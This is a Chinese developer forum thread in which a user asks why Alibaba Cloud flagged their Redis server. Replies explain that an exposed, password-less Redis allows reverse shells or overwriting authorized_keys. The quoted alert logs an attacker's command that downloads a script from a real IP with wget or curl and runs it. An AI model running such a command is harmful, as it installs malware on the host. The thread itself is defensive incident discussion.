收到阿里云紧急安全事件提醒怎么办?

ponponon
  • 1.6k

图片.png

这是咋回事?我的云服务器只能是公钥登录,都不能账号密码呀,黑客是怎么来我的服务器上执行代码的?

难道是因为我开了 redis 的原因吗?

图片.png

通过 redis 的安全漏洞入侵的?

该告警由如下引擎检测发现:
命令行: sh -c (wget -O /tmp/russ http://106.246.224.219/russia.sh || curl -o /tmp/russ http://106.246.224.219/russia.sh); chmod 700 /tmp/russ; /tmp/russ
进程PID: 756468
进程文件名: dash
父进程ID: 632
父进程: redis-check-rdb
父进程文件路径: /usr/bin/redis-check-rdb
进程链:

-[632]  /usr/bin/redis-server *:6379
事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。
回复
阅读 962
2 个回答
用户bPbeJAR
  • 17
山东

如果你把redis的端口6379公开访问的话,而且redis的密码为空或者是弱口令的话就会被黑客利用,一般黑客利用redis提权都是直接执行反弹shell的。

ssseerr999
  • 1.2k

是不是redis没有密码而且端口开放在公网了

百度一下可以找到很多关于redis的漏洞和工具

也不是 ssh密钥登录就安全,用密钥登录可以防被猜密码

redis有权限的话可以直接覆盖~/.ssh/authorized_keys,黑客替换之后就能直接登录ssh

撰写回答
你尚未登录,登录后可以
  • 和开发者交流问题的细节
  • 关注并接收问题和回答的更新提醒
  • 参与内容的编辑和改进,让解决方法与时俱进
宣传栏